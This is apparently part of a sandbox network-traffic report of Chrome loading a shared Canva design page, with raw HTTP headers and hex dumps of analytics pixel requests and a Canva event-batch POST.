                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BUCY6MpwoeAi%2B3LzHMAv%2BqGOP7WK8qWId5SjDANiM6MWWBMBKVgjFVn87oIOq4N8Wj4qerpooUdbHCGspW24W8Jg0SmoClDPP7HOsjSCb8iKKh1UTvqkHM2xVosLVcnVt4U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC92INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC1369INData Raw: 00 00 01 00 01 00 20 20 00 00 01 00 20 00 28 11 00 00 16 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 10 00 00 13 0b 00 00 13 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 01 ff 40 80 04 00 00 00 00 00 00 00 00 f3 23 68 16 f9 21 67 5c fc 22 68 9d fa 21 69 c9 f8 23 6b e3 f7 24 6c fb f6 24 6e fb f5 24 6f e3 f2 25 71 c9 f2 25 72 9d f1 27 73 5b e8 23 74 16 00 00 00 00 00 00 00 00 ff 40 80 04 ff 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 55 55 03 00 00 00 00 00 00 00 00 f9 2c 5d 29 fa 2b 5f 9f fb 29 62 f2 ff 2a 6a ff ff 29 6c ff ff 27 6c ff ff 25 6c ff f8 24 6b ff f7
                                                                                                                                                                                                                                                    Data Ascii: (( @ @#h!g\"h!i#k$l$n$o%q%r's[#t@UU,])+_)b*j)l'l%l$k
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC1369INData Raw: ff e4 5f 00 ff f8 e2 dc ff ff ff ff ff ff ff ff ff fa e7 e4 ff e5 58 00 ff e7 6d 45 ff e7 69 3e ff e6 67 3c ff e6 67 3d ff e5 66 3f ff e5 6a 48 ff e5 67 48 ff e1 35 00 ff f7 dd db ff fa ea ea ff e0 3e 27 ff e2 5b 59 ff e3 51 59 ff e3 4c 5f ff e3 46 64 ff e4 40 6a fe e7 3a 72 ff e6 35 75 f2 dc 2e 74 16 e0 81 2d 5b ed 89 30 ff de 80 2d fb e0 7f 2d ff e0 7d 2e ff e1 7d 33 ff e1 75 16 ff e5 8b 5e ff fe fa f9 ff ff fe fe ff ff ff ff ff ef b9 a9 ff e2 5d 00 ff e5 75 41 ff e4 6f 36 ff e4 6f 38 ff e4 6e 39 ff e3 6d 3a ff e3 6c 3b ff e3 6d 43 ff e2 66 3a ff e2 6b 4a ff fd f7 f6 ff e8 9a 90 ff df 4a 30 ff e1 5d 58 ff e1 54 59 ff e2 4e 5e ff e2 48 64 ff e3 42 6a fb f3 3e 77 ff e6 38 73 5b db 8a 29 9d ea 92 2b ff db 88 28 fb dc 87 28 ff dd 86 28 ff de 87 34 ff dd 78
                                                                                                                                                                                                                                                    Data Ascii: _XmEi>g<g=f?jHgH5>'[YQYL_Fd@j:r5u.t-[0--}.}3u^]uAo6o8n9m:l;mCf:kJJ0]XTYN^HdBj>w8s[)+(((4x
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC1369INData Raw: d8 7a 3c fb e8 7a 46 ff db 6f 45 5c d1 ae 0c 16 d0 b3 0e f2 d1 b7 0c ff cf b7 0a fe ce b8 09 ff ce b9 08 ff ce ba 05 ff cf bc 26 ff c9 b5 00 ff e6 de b3 ff ff ff ff ff ff ff ff ff f5 f1 e2 ff cc b4 00 ff cf b7 20 ff cf b4 16 ff cf b1 0d ff d0 af 0f ff d1 ae 28 ff ce a2 00 ff f1 e7 d6 ff ff ff ff ff f8 f3 ec ff d3 9d 1d ff d3 98 23 ff d4 94 29 ff d5 8f 2c ff d6 89 30 ff d7 85 34 fe da 7f 3a ff d9 78 3e f2 dc 74 46 16 00 00 00 00 cf b5 0b 9f dd c3 0b ff ce b9 09 fa ce ba 08 ff ce bb 07 ff cd bc 07 ff cd bd 0a ff cd be 12 ff cb bb 00 ff f3 f0 de ff ff ff ff ff ff ff ff ff e8 e1 bb ff c8 b1 00 ff cf b9 22 ff cf b7 27 ff cf b4 19 ff d1 b4 32 ff cc a7 00 ff ec e1 c6 ff ff ff ff ff fb f9 f4 ff d5 a9 4d ff d2 9a 00 ff d4 98 29 ff d4 92 28 ff d5 8d 2d ff d6 89 31
                                                                                                                                                                                                                                                    Data Ascii: z<zFoE\& (#),04:x>tF"'2M)(-1
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC307INData Raw: b9 0a 9d cd b4 0b 5c d1 ae 0c 16 00 00 00 00 00 00 00 00 ff bf 00 04 ff ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                    Data Ascii: \


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    95192.168.2.44985254.171.122.26443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC623OUTGET /spp.pl?a=10000&.yp=10137834&gtmcb=1957190974 HTTP/1.1
                                                                                                                                                                                                                                                    Host: sp.analytics.yahoo.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC948INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:49 GMT
                                                                                                                                                                                                                                                    Expires: Thu, 19 Dec 2024 21:27:49 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, private, must-revalidate
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                    Server: ATS/9.1.10.144
                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Via: http/1.1 traffic_server (ApacheTrafficServer/9.1.10.144)
                                                                                                                                                                                                                                                    Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    Content-Security-Policy: sandbox; default-src 'self'; script-src 'none'; object-src 'none'; report-uri http://csp.yahoo.com/beacon/csp?src=generic
                                                                                                                                                                                                                                                    Set-Cookie: A3=d=AQABBNWPZGcCEF41nL8rufc-sEzDw34OyqYFEgEBAQHhZWduZ9xS0iMA_eMAAA&S=AQAAAhlKvtvio19ZM0EiElG_jq4; Expires=Sat, 20 Dec 2025 03:27:49 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff ff ff ff 21 f9 04 04 14 00 ff 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    96192.168.2.44985399.83.205.94443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC690OUTGET /i?aid=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&e=pv&p=web&tv=1x1&url=www.canva.com&refr=&uid=undefined&gtmcb=783739181 HTTP/1.1
                                                                                                                                                                                                                                                    Host: p.tvpixel.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:49 GMT
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Set-Cookie: sp=da8c0ec1-5c9d-478b-85a1-77ccfcb7becb; Expires=Fri, 19 Dec 2025 21:27:49 GMT; Domain=tvpixel.com; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 f0 00 00 ff ff ff 00 00 00 21 f9 04 05 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    97192.168.2.44985118.161.69.117443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:49 UTC708OUTGET /p?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=1610630260 HTTP/1.1
                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    2024-12-19 21:27:50 UTC756INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:50 GMT
                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                    Location: /p2?c1=2&c2=34402982&ns_type=hidden&ns_event=page_view&c6=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&c7=&c9=&c8=&gtmcb=1610630260
                                                                                                                                                                                                                                                    set-cookie: UID=13Dfb7d508bf078883371d51734643670; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                    set-cookie: XID=13Dfb7d508bf078883371d51734643670; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                    Via: 1.1 9a083eb078d0da4593a0f35b4bd486de.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: DXB52-P1
                                                                                                                                                                                                                                                    X-Amz-Cf-Id: Jvz2vXZPtKTcmxJE7QS-ZXsetDtiNganBYi_TtTvmcfNJssAQdWB_g==


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    98192.168.2.449854104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:50 UTC3259OUTPOST /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    Content-Length: 1624
                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-App: responsive_design_viewer
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    X-Canva-Build-Sha: e404dd6
                                                                                                                                                                                                                                                    X-Csrf-Token: Yzy1uD0I9GT_B9ypZbbQGK0r5qOlIcQ_PeqpudldO8IdMaoCmBoSvbrl3Hh6B9GL1gyOOuPINaA6kk4fV9uPuktO7bs
                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                    X-Canva-Analytics: AAQAA1dFQgAA
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                    X-Canva-Request: recordanalyticseventbatch
                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241217-21
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4a
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M; gtm_fpc_engagement_event={"url":"https://www.canva.com/design/DAGZxEJ [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:50 UTC1624OUTData Raw: 7b 22 41 22 3a 5b 7b 22 41 3f 22 3a 22 44 22 2c 22 41 22 3a 7b 22 41 22 3a 22 63 34 64 34 63 34 36 31 2d 34 35 35 31 2d 34 65 36 33 2d 39 39 64 32 2d 36 39 32 35 31 36 34 64 31 30 34 63 22 2c 22 45 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 34 36 2e 35 39 38 5a 22 2c 22 46 22 3a 22 32 30 32 34 2d 31 32 2d 31 39 54 32 31 3a 32 37 3a 34 38 2e 35 36 35 5a 22 2c 22 48 22 3a 22 65 6e 22 2c 22 49 22 3a 7b 22 41 22 3a 22 55 53 22 7d 2c 22 4a 22 3a 22 57 45 42 22 2c 22 4b 22 3a 7b 22 41 41 54 53 4f 22 3a 22 41 31 22 2c 22 57 4b 44 55 49 22 3a 22 41 22 2c 22 56 53 45 4d 4c 22 3a 22 43 22 2c 22 54 53 51 52 4c 22 3a 22 42 22 2c 22 54 4f 4d 4c 4f 22 3a 22 41 22 2c 22 53 45 4f 50 53 22 3a 22 43 22 2c 22 52 52 53 4e 43 22 3a 22 41 22 2c 22 52 52 53 43
                                                                                                                                                                                                                                                    Data Ascii: {"A":[{"A?":"D","A":{"A":"c4d4c461-4551-4e63-99d2-6925164d104c","E":"2024-12-19T21:27:46.598Z","F":"2024-12-19T21:27:48.565Z","H":"en","I":{"A":"US"},"J":"WEB","K":{"AATSO":"A1","WKDUI":"A","VSEML":"C","TSQRL":"B","TOMLO":"A","SEOPS":"C","RRSNC":"A","RRSC
                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC1063INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:50 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a9eab1915bb-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                    x-request-id: 8f4a7a9eab1915bb
                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2Fq50ADFQRAQPh1oWTMMTojfHVHNGIZIkRpS6XrzdOBId2B8Us2gzMfZ8Oe91JtsOkV7DyoLZogAbiRCFPqTH0Sir9xaVZu94aU4%2BZilYfqx5pdjBA9OW8b%2FqnXzIaY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC28INData Raw: 31 36 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 7d 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 16'"])}while(1);</x>//{}
                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    99192.168.2.44985554.246.144.89443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC497OUTGET /spp.pl?a=10000&.yp=10137834&gtmcb=1957190974 HTTP/1.1
                                                                                                                                                                                                                                                    Host: sp.analytics.yahoo.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: A3=d=AQABBNWPZGcCEF41nL8rufc-sEzDw34OyqYFEgEBAQHhZWduZ9xS0iMA_eMAAA&S=AQAAAhlKvtvio19ZM0EiElG_jq4
                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC948INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:51 GMT
                                                                                                                                                                                                                                                    Expires: Thu, 19 Dec 2024 21:27:51 GMT
                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, private, must-revalidate
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                    Server: ATS/9.1.10.144
                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Via: http/1.1 traffic_server (ApacheTrafficServer/9.1.10.144)
                                                                                                                                                                                                                                                    Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only"
                                                                                                                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                    Content-Security-Policy: sandbox; default-src 'self'; script-src 'none'; object-src 'none'; report-uri http://csp.yahoo.com/beacon/csp?src=generic
                                                                                                                                                                                                                                                    Set-Cookie: A3=d=AQABBNWPZGcCEF41nL8rufc-sEzDw34OyqYFEgEBAQHhZWduZ9xS0iMA_eMAAA&S=AQAAAhlKvtvio19ZM0EiElG_jq4; Expires=Sat, 20 Dec 2025 03:27:51 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly
                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC43INData Raw: 47 49 46 38 39 61 01 00 01 00 80 00 00 ff ff ff ff ff ff 21 f9 04 04 14 00 ff 00 2c 00 00 00 00 01 00 01 00 00 02 02 44 01 00 3b
                                                                                                                                                                                                                                                    Data Ascii: GIF89a!,D;


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    100192.168.2.44985675.2.57.54443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC506OUTGET /i?aid=canva-aad9e5ad-3a29-42d3-a4e3-b2a423a0bfe7&e=pv&p=web&tv=1x1&url=www.canva.com&refr=&uid=undefined&gtmcb=783739181 HTTP/1.1
                                                                                                                                                                                                                                                    Host: p.tvpixel.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: sp=da8c0ec1-5c9d-478b-85a1-77ccfcb7becb
                                                                                                                                                                                                                                                    2024-12-19 21:27:51 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:51 GMT
                                                                                                                                                                                                                                                    Content-Type: image/gif
                                                                                                                                                                                                                                                    Content-Length: 43
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                    Set-Cookie: sp=da8c0ec1-5c9d-478b-85a1-77ccfcb7becb; Expires=Fri, 19 Dec 2025 21:27:51 GMT; Domain=tvpixel.com; Path=/; SameSite=None; Secure
                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
